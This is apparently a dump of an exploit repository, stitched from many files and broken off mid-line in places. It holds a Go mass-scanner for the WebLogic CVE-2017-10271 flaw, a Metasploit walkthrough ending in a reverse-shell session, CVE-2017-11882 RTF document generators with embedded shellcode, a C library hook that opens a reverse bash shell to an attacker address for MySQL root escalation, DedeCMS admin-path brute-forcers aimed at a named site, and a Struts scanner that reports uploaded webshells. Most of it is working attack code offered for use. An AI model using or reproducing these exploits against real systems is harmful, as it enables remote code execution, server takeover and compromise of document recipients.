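	RootCmd.Flags().StringVarP(&config.Lhost, "listening-host", "s", "", "The IP of this machine's public interface")
	RootCmd.Flags().IntVarP(&config.Lport, "listening-port", "l", 4444, "The port to listen for vulnerable responses")
	RootCmd.Flags().StringVarP(&config.TargetFile, "target-file", "t", "", "File with list of targets in http(s)://HOSTNAME:PORT format")
	RootCmd.Flags().BoolVarP(&config.Verbose, "verbose", "v", false, "Enable verbose mode (Print who is being scanned)")
	RootCmd.Flags().BoolVarP(&config.AllURLs, "all-urls", "u", false, "Check for all possible vulnerable URL suffixes")
	RootCmd.Flags().StringVarP(&config.OutputFile, "output-file", "o", "", "File to output results to")
	RootCmd.Flags().IntVarP(&config.Threads, "threads", "a", 10, "Number of threads to use while scanning")
	RootCmd.Flags().IntVarP(&config.WaitTime, "wait-time", "w", 20, "Seconds to wait after we complete sending payloads")
}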
// ---- /CVE-2017-10271/scanners/cmd/version.go ----
// Copyright © 2018 Kevin Kirsche
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

package cmd

import (
	"strings"

	"github.com/sirupsen/logrus"
	"github.com/spf13/cobra"
)

// Build metadata. Nothing in this package assigns these, so they stay empty
// unless the build injects them (presumably via -ldflags "-X ..." from the
// Makefile in this directory; confirm there).
var (
	// BuildVersion is the release version of the binary (e.g. 1.2.0).
	BuildVersion string
	// BuildGoVersion is the Go toolchain version the binary was built with.
	BuildGoVersion string
	// BuildHash is the git commit the binary was built from.
	BuildHash string
	// BuildTime is when the binary was built.
	BuildTime string
)

// versionCmd is the "version" subcommand: it prints the build metadata
// above so an operator can tell exactly which build of the scanner is
// running.
var versionCmd = &cobra.Command{
	Use:   "version",
	Short: "The version of the binary",
	Long: `The build date and build hash associated with the build to allow for
better identification of when the binary was made and what features it
offers`,
	Run: func(cmd *cobra.Command, args []string) {
		// The build apparently encodes spaces in BuildGoVersion as "|^|";
		// turn them back into spaces for display.
		goVersion := strings.Replace(BuildGoVersion, "|^|", " ", -1)
		logrus.Printf("Version:\t%s", BuildVersion)
		logrus.Printf("Go Version:\t%s", goVersion)
		logrus.Printf("Git Hash:\t%s", BuildHash)
		logrus.Printf("Build Time:\t%s", BuildTime)
	},
}

// init registers the version subcommand on the root command. It defines no
// flags of its own.
func init() {
	RootCmd.AddCommand(versionCmd)
}

// ---- /CVE-2017-10271/scanners/libcve201710271/banner.go ----
package libcve201710271

import (
	"fmt"
	"strings"
)

// Banner prints a fixed-width header followed by every field of config,
// one per line, so the operator can confirm the scan settings before any
// request is sent.
func Banner(config Config) {
	rule := strings.Repeat("=", 80)

	fmt.Println(rule)
	fmt.Println("Author: Kevin Kirsche (d3c3pt10n)")
	fmt.Println(rule)
	fmt.Println("Configuration:")

	settings := []string{
		fmt.Sprintf("\tListening Host: %s", config.Lhost),
		fmt.Sprintf("\tListening Port: %d", config.Lport),
		fmt.Sprintf("\tOutput File: %s", config.OutputFile),
		fmt.Sprintf("\tTargets File: %s", config.TargetFile),
		fmt.Sprintf("\tThreads: %d", config.Threads),
		fmt.Sprintf("\tScan Complete Wait Time: %d", config.WaitTime),
		fmt.Sprintf("\tScan All URLs: %t", config.AllURLs),
		fmt.Sprintf("\tVerbose mode: %t", config.Verbose),
	}
	for _, line := range settings {
		fmt.Println(line)
	}

	fmt.Println(rule)
}

// ---- /CVE-2017-10271/scanners/libcve201710271/config.go ----
package libcve201710271

// Config holds the command-line settings for one scan run. The field
// meanings follow the flag help text registered in cmd/root.go.
type Config struct {
	Lhost      string // IP of this machine's public interface, advertised to targets for the callback
	Lport      int    // port the callback listener waits on for vulnerable responses
	TargetFile string // file listing targets in http(s)://HOSTNAME:PORT format
	Verbose    bool   // print who is being scanned
	OutputFile string // file results are written to ("" means none)
	Threads    int    // number of worker goroutines sending payloads
	WaitTime   int    // seconds to keep waiting for callbacks after all payloads are sent
	AllURLs    bool   // scan every known wls-wsat endpoint suffix instead of only the default
}
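// ---- /CVE-2017-10271/scanners/libcve201710271/payload.go ----
package libcve201710271

import (
	"fmt"
	"net/url"
)

// GenerateCheckPayload builds the request body that SendRequest POSTs to a
// wls-wsat endpoint. The body embeds a callback URL pointing at this
// scanner's listener (lhost:lport); rhost and u are query-escaped into the
// "target" parameter so the callback handler in cmd/root.go can report
// which target and endpoint called back. A target that fetches the URL is
// reported as vulnerable.
//
// NOTE(review): the XML/SOAP envelope that should surround the callback
// URL is not present in this listing — only blank lines and the URL
// survive. Confirm the template against the upstream source before use.
func GenerateCheckPayload(lhost string, lport int, rhost, u string) string {
	xmlPayload := fmt.Sprintf(`




http://%s:%d/cve-2017-10271?target=%s%s








`, lhost, lport, url.QueryEscape(rhost), url.QueryEscape(u))

	return xmlPayload
}

// ---- /CVE-2017-10271/scanners/libcve201710271/request.go ----
package libcve201710271

import (
	"bytes"
	"crypto/tls"
	"fmt"
	"net/http"
	"strings"
	"sync"
	"time"

	"github.com/sirupsen/logrus"
)

// SendRequest POSTs th.P to th.R+th.U on behalf of worker id and logs the
// outcome. It never returns an error: a failure is logged and the target
// is skipped, because the vulnerability verdict comes from whether the
// target calls back to the listener, not from the HTTP response seen here.
// m serialises log output between workers.
func SendRequest(th TargetHost, id int, m *sync.Mutex) {
	// Scan targets routinely present self-signed certificates, so
	// verification is deliberately disabled. Acceptable for a scanner that
	// sends nothing sensitive; do not reuse this transport for anything
	// that does.
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}

	client := &http.Client{
		Timeout:   10 * time.Second,
		Transport: tr,
	}

	// Bare HOST:PORT targets default to plain HTTP.
	if !strings.HasPrefix(th.R, "http") {
		th.R = fmt.Sprintf("http://%s", th.R)
	}

	url := fmt.Sprintf("%s%s", th.R, th.U)
	req, err := http.NewRequest("POST", url, bytes.NewBuffer([]byte(th.P)))
	if err != nil {
		m.Lock()
		logrus.WithError(err).Errorln("Failed to create HTTP POST request")
		m.Unlock()
		return
	}

	req.Header.Add("Content-Type", "text/xml; charset=UTF-8")
	req.Header.Add("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36")

	m.Lock()
	logrus.Infof("Sending payload to %s in worker %d", url, id)
	m.Unlock()

	res, err := client.Do(req)
	if err != nil {
		m.Lock()
		logrus.WithError(err).Errorln("Error occurred while performing POST request")
		m.Unlock()
		return
	}
	// The response body was previously never closed, so every target held
	// its connection open until the transport was garbage-collected; with
	// a long target list and several workers that leaks file descriptors.
	// Nothing is read from the body, so close it as soon as we have it.
	defer res.Body.Close()

	m.Lock()
	logrus.WithFields(logrus.Fields{
		"status_code": res.StatusCode,
		"status":      res.Status,
	}).Infof("Payload sent to %s from worker %d", url, id)
	m.Unlock()
}

// ---- /CVE-2017-10271/scanners/libcve201710271/target.go ----
package libcve201710271

// TargetHost is one unit of work for a Worker: where to send, what to send,
// and which endpoint path to hit.
type TargetHost struct {
	// R is the remote host, as http(s)://HOST:PORT or bare HOST:PORT
	// (SendRequest prefixes the latter with http://).
	R string
	// P is the request body produced by GenerateCheckPayload.
	P string
	// U is the endpoint path appended to R, one of DefaultURLs / AllURLs.
	U string
}

// ---- /CVE-2017-10271/scanners/libcve201710271/urls.go ----
package libcve201710271

var (
	// DefaultURLs is the endpoint path scanned unless --all-urls is given.
	DefaultURLs = []string{
		"/wls-wsat/CoordinatorPortType",
	}

	// AllURLs lists every wls-wsat endpoint path known to be exposed; it is
	// used when --all-urls is set, at the cost of eight requests per host.
	AllURLs = []string{
		"/wls-wsat/CoordinatorPortType",
		"/wls-wsat/CoordinatorPortType11",
		"/wls-wsat/ParticipantPortType",
		"/wls-wsat/ParticipantPortType11",
		"/wls-wsat/RegistrationPortTypeRPC",
		"/wls-wsat/RegistrationPortTypeRPC11",
		"/wls-wsat/RegistrationRequesterPortType",
		"/wls-wsat/RegistrationRequesterPortType11",
	}
)

// ---- /CVE-2017-10271/scanners/libcve201710271/workers.go ----
package libcve201710271

import (
	"sync"

	"github.com/sirupsen/logrus"
)

// Worker drains jobs, calling SendRequest for each TargetHost, and returns
// once the channel is closed. It logs its own start and finish; m is the
// shared log mutex passed through to SendRequest.
func Worker(id int, m *sync.Mutex, jobs <-chan TargetHost) {
	m.Lock()
	logrus.Infof("Worker %d started", id)
	m.Unlock()
	for th := range jobs {
		SendRequest(th, id, m)
	}
	m.Lock()
	logrus.Infof("Worker %d finished", id)
	m.Unlock()
}

// ---- /CVE-2017-10271/scanners/main.go ----
// Copyright © 2018 Kevin Kirsche
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.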
14 | 15 | package main 16 | 17 | import "github.com/kkirsche/CVE-2017-10271/scanners/cmd" 18 | 19 | func main() { 20 | cmd.Execute() 21 | } 22 | -------------------------------------------------------------------------------- /CVE-2017-10271/vulnerable_machine_setup.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Application 2 | 3 | Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution. 4 | 5 | ### Windows: Setting up a vulnerable application 6 | 7 | We successfully tested this exploit against a fully-patched, Windows 10 (x64) target. Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM. 8 | 9 | 1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`). 10 | 2. Run the installer. (See [here] for detailed instructions.) You may be prompted to install a Java Development Kit (JDK). [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working. 11 | 3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it. 12 | 4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192). Domain names and credentials are irrelevant. At the conclusion of the wizard, click "Start Admin Server". 13 | 5. The `startWebLogic.cmd` should run immediately after the installer and present logging output. 
Once running, the window should output a line similar to the following 14 | ``` 15 | 16 | 17 | ``` 18 | 19 | ### Windows: Attacking a vulnerable application 20 | 21 | Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`: 22 | 23 | ``` 24 | msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce 25 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target] 26 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0 27 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell 28 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker] 29 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run 30 | 31 | [*] Started reverse TCP handler on 192.168.108.1:4444 32 | [*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600 33 | 34 | Microsoft Windows [Version 10.0.16299.192] 35 | (c) 2017 Microsoft Corporation. All rights reserved. 36 | 37 | C:\Oracle\Middleware\user_projects\domains\admindomain>whoami 38 | weblogic-server\Administrator 39 | ``` 40 | 41 | ### Unix: Setting up a vulnerable environment 42 | 43 | 1. If necessary, install Docker.io. [These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM: 44 | 45 | ``` 46 | apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D 47 | echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list 48 | apt update 49 | apt-get install docker-engine 50 | service docker start 51 | docker run hello-world 52 | ``` 53 | 54 | 2. 
Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0. The `-p` flags below publish an intentionally vulnerable, unauthenticated-RCE service on every host interface (including port 80); unless the host sits on an isolated lab network, bind it to loopback instead (for example `-p127.0.0.1:7001:7001`) and drop the port-80 mapping:
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 12 | ''' 13 | 14 | tail=r''' 15 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000
005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000 16 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 17 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 18 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002 19 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000 20 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000 21 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000 22 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100 23 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a 24 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300 25 | 00000000 26 | }}} 27 | \par} 28 | ''' 29 | #0: b8 44 eb 71 12 mov eax,0x1271eb44 30 | #5: ba 78 56 34 12 mov edx,0x12345678 31 | #a: 31 d0 xor eax,edx 32 | #c: 8b 08 mov ecx,DWORD PTR [eax] 33 | #e: 8b 09 mov ecx,DWORD PTR [ecx] 34 | #10: 8b 09 mov ecx,DWORD PTR [ecx] 35 | #12: 66 83 c1 3c add cx,0x3c 36 | #16: 31 db xor ebx,ebx 37 | #18: 53 push ebx 38 | #19: 51 push ecx 39 | #1a: be 64 3e 72 12 mov esi,0x12723e64 40 | #1f: 31 d6 xor esi,edx 41 | #21: ff 16 call DWORD PTR [esi] // call WinExec 42 | 
#23: 53 push ebx 43 | #24: 66 83 ee 4c sub si,0x4c 44 | #28: ff 10 call DWORD PTR [eax] // call ExitProcess 45 | stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10" 46 | 47 | 48 | # pads with nop 49 | stage1=stage1.ljust(44,'\x90') 50 | 51 | def genrtf(cmd): 52 | if len(cmd) > 109: 53 | raise ValueError("Command must be shorter than 109 bytes") 54 | payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ' 55 | payload+=stage1 56 | payload+=pack(' 51 | #include 52 | #include 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | #include 59 | #include 60 | #include 61 | #include 62 | 63 | #define ATTACKERS_IP "127.0.0.1" 64 | #define SHELL_PORT 6033 65 | #define INJECTED_CONF "/var/lib/mysql/my.cnf" 66 | 67 | char* env_list[] = { "HOME=/root", NULL }; 68 | typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]); 69 | static execvp_func_t old_execvp = NULL; 70 | 71 | 72 | // fork & send a bash shell to the attacker before starting mysqld 73 | void reverse_shell(void) { 74 | 75 | int i; int sockfd; 76 | //socklen_t socklen; 77 | struct sockaddr_in srv_addr; 78 | srv_addr.sin_family = AF_INET; 79 | srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port 80 | srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip 81 | 82 | // create new TCP socket && connect 83 | sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); 84 | connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); 85 | 86 | for(i = 0; i <= 2; i++) dup2(sockfd, i); 87 | execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list ); 88 | 89 | exit(0); 90 | } 91 | 92 | 93 | /* 94 | cleanup injected data from the target config before it is read by mysqld 95 | in order to ensure clean startup of the service 96 | 97 | The injection (if 
done via logging) will start with a line like this: 98 | 99 | /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: 100 | 101 | */ 102 | 103 | int config_cleanup() { 104 | 105 | FILE *conf; 106 | char buffer[2000]; 107 | long cut_offset=0; 108 | 109 | conf = fopen(INJECTED_CONF, "r+"); 110 | if (!conf) return 1; 111 | 112 | while (!feof(conf)) { 113 | fgets(buffer, sizeof(buffer), conf); 114 | if (strstr(buffer,"/usr/sbin/mysqld, Version")) { 115 | cut_offset = (ftell(conf) - strlen(buffer)); 116 | } 117 | 118 | } 119 | if (cut_offset>0) ftruncate(fileno(conf), cut_offset); 120 | fclose(conf); 121 | return 0; 122 | 123 | } 124 | 125 | 126 | // execvp() hook 127 | int execvp(const char* filename, char* const argv[]) { 128 | 129 | pid_t pid; 130 | int fd; 131 | 132 | // Simple root PoC (touch /root/root_via_mysql) 133 | fd = open("/root/root_via_mysql", O_CREAT); 134 | close(fd); 135 | 136 | old_execvp = dlsym(RTLD_NEXT, "execvp"); 137 | 138 | // Fork a reverse shell and execute the original execvp() function 139 | pid = fork(); 140 | if (pid == 0) 141 | reverse_shell(); 142 | 143 | // clean injected payload before mysqld is started 144 | config_cleanup(); 145 | return old_execvp(filename, argv); 146 | } 147 | 148 | 149 | -------------------------------------------------------------------------------- /dedecms/found_admin_login_page.php: -------------------------------------------------------------------------------- 1 | true, 7 | CURLOPT_HEADER => true, 8 | CURLOPT_POST => true, 9 | CURLOPT_SSL_VERIFYHOST => false, 10 | CURLOPT_SSL_VERIFYHOST => false, 11 | CURLOPT_COOKIE => $cookie, 12 | CURLOPT_POSTFIELDS => $data, 13 | ); 14 | $ch = curl_init($url); 15 | curl_setopt_array($ch, $options); 16 | $result = curl_exec($ch); 17 | curl_close($ch); 18 | return $result; 19 | } 20 | $testlen=25; 21 | $str=range('a','z'); 22 | $number=range(0,9,1); 23 | $dic = array_merge($str, $number); 24 | $n=true; 25 | $nn=true; 26 | $path=''; 27 | while($n){ 28 | 
foreach($dic as $v){ 29 | foreach($dic as $vv){ 30 | #echo $v.$vv .'----'; 31 | $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv -------------------------------------------------------------------------------- /dedecms/found_admin_login_page.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | '''/* 3 | * author = Mochazz 4 | * team = 红日安全团队 5 | * env = pyton3 6 | * 7 | */ 8 | ''' 9 | import requests 10 | import itertools 11 | characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" 12 | back_dir = "" 13 | flag = 0 14 | url = "http://kaitin.cn/tags.php" 15 | data = { 16 | "_FILES[mochazz][tmp_name]" : "./{p}<""" 123 | test=url+payload 124 | request = urllib2.Request(test) 125 | response = urllib2.urlopen(request) 126 | get5=response.code 127 | if(get5==200 and get4==200 and get3==200 and get2==200 and get1==200): 128 | print " The webshell may have uploaded to /one1.jsp" 129 | print " Try to edit and use upload.html to upload your webshell\n" 130 | 131 | 132 | 133 | def message(self): 134 | print "You should use -u to test single website / or use -l to import a txt file to test more website" 135 | 136 | 137 | if __name__ == '__main__': 138 | struts=struts() 139 | try: 140 | opts,args=getopt.getopt(sys.argv[1:],"u:l:") 141 | except getopt.GetoptError: 142 | struts.message() 143 | sys.exit(2) 144 | if not len(opts): 145 | struts.message() 146 | sys.exit(2) 147 | for o, a in opts: 148 | if o in ("-u"): 149 | struts.sixteen(a) 150 | struts.nineteen(a) 151 | struts.twenty(a) 152 | if o in ("-l"): 153 | for line in open(a): 154 | struts.sixteen(line) 155 | struts.nineteen(line) 156 | struts.twenty(line) 157 | 158 | -------------------------------------------------------------------------------- /webdav_exec_CVE-2017-11882.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | 4 | RTF_HEADER = 
R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} 5 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1 6 | \pard\sa200\sl276\slmult1\f0\fs22\lang9""" 7 | 8 | 9 | RTF_TRAILER = R"""\par} 10 | """ 11 | 12 | 13 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """ 14 | 15 | 16 | OBJECT_TRAILER = R""" 17 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 18 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 19 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002 20 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000 21 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000 22 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000 23 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100 24 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a 25 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300 26 | 00000000 27 | }}} 28 | """ 29 | 30 | 31 | OBJDATA_TEMPLATE = R""" 32 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 33 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 34 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff 35 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 36 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 37 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 38 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 39 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 40 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 41 | 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 42 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 43 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 44 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 45 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe 46 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 47 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 48 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 49 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 50 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 51 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 52 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 53 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 54 | 